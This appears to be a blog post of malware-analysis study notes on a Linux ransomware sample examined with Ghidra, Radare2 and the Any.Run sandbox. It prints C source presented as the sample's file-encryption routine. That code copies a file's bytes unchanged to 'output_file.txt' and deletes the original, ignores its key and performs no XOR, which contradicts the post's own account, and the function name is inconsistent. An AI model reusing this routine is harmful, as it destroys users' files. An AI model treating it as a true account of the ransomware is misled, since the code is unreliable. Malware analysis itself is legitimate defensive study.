We analyzed a sample Linux ransomware using reverse engineering tools such as Ghidra and Radare2. Additionally, we performed dynamic malware analysis by running the sample in a Ubuntu environment using Any.Run online sandbox.
Blue Team Cyber Security & SOC Analyst Study Notes
Windows Active Directory Penetration Testing Study Notes
What is Reverse Engineering
Reverse engineering is an advanced method to analyze binaries including malware samples. It requires knowledge of the CPU language, that is, Assembly. In reverse engineering, we reverse the binary back to its cpu language to reveal all instructions that it sends to the CPU.
Linux Ransomware
Even though Linux is thought to be more safe than other operating systems, ransomware and other malicious attacks can still affect it. Malicious software known as “ransomware” encrypts files on a victim’s computer and demands a ransom to unlock the files.
In recent years, Linux computers have been the victim of multiple ransomware incidents. The “Linux.Encoder” ransomware, which first surfaced in 2015, is one such instance. Specifically designed to encrypt files on Linux-based web servers, this ransomware demanded a payment from the server administrators.
Like any other operating system, Linux computers are susceptible to security holes and attacks, which is why they can become infected with ransomware. Despite being open-source software and having strong security features, Linux is not impervious to bugs. Cybercriminals may use these vulnerabilities to get unauthorized access to Linux systems and install ransomware.
Linux Ransomware Analysis with Ghidra
We analyzed the given sample in the video using Ghidra by dissecting the logic of the functions such as:
- main function
- process.directory function
- encrypt_files function
We saw that the main function contains only one call to the process.directory function passing two arguments:
- the directory to be encrypted
- the encryption string
The process.directory function loops through every single file inside the given directory and performs an XOR encryption by calling the encrypt_files function.
Check out below the source code of encrypt_files function
void encrypt_file(char *filename, char *s) {
FILE *stream = fopen(filename, "rb");
if (stream == NULL) {
printf("Error opening file: %s\n", filename);
return;
}
fseek(stream, 0, SEEK_END);
long nitems = ftell(stream);
rewind(stream);
char *ptr = (char *)malloc(nitems);
fread(ptr, 1, nitems, stream);
fclose(stream);
FILE *output = fopen("output_file.txt", "wb");
if (output == NULL) {
printf("Error creating note file: %s\n", "output_file.txt");
free(ptr);
return;
}
fwrite(ptr, 1, nitems, output);
fclose(output);
free(ptr);
int result = remove(filename);
if (result != 0) {
printf("Error deleting original file: %s\n", filename);
}
}
int main() {
char *filename = "example.txt";
char *s = "some_key";
encrypt_file(filename, s);
return 0;
}
Linux Ransomware Analysis with Any.Run
We analyzed the sample also using Any.Run, check out the video below to take a look at the execution of the given Linux ransomware in a Ubuntu environment.
Start analyzing malware using Any.Run. New and current users can get 6 months of service or extra Enterprise-tier licenses for free.
Check out the video below for detailed explanation.